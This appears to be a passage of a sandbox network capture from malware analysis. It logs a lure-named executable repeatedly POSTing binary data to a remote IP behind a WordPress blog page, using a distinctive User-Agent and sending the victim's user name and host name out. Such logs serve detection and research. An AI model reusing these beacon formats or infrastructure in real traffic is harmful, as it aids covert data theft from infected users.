Apr 25, 2024 09:42:24.977797031 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:24.977895975 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:24.978091002 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:24.978173971 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:25.006469965 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:25.009780884 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:25.009793043 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:25.009803057 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49771	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:25.250535965 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:25.381947041 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:26.197526932 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:25 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:26.197863102 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:26.197973967 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:26.206537008 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:26.206547976 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:26.206597090 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:26.206752062 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:26.206873894 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:26.206955910 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:26.207056999 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49772	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:26.688177109 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:26.819386959 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:27.655317068 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:26 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:27.655333996 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:27.655489922 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:27.663259029 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:27.663711071 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:27.663721085 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:27.663829088 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:27.663921118 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:27.664079905 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:27.664182901 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49773	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:28.624649048 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:28.750395060 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:29.653106928 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:28 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:29.653162003 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:29.653328896 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:29.653413057 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:29.653556108 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:29.667067051 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:29.673437119 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:29.673597097 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:29.673751116 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:29.673885107 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49774	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:29.915605068 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:30.041357040 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:30.838670969 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:29 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:30.838778973 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:30.838813066 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:30.838910103 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:30.838983059 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:30.848464966 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:30.848826885 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:30.848984957 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:30.849061966 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:30.849200964 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49775	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:31.102796078 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:31.228517056 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:32.062141895 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:31 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:32.062201977 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:32.062460899 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:32.062566042 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:32.062864065 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:32.071769953 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:32.072137117 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:32.072247028 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:32.072329998 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
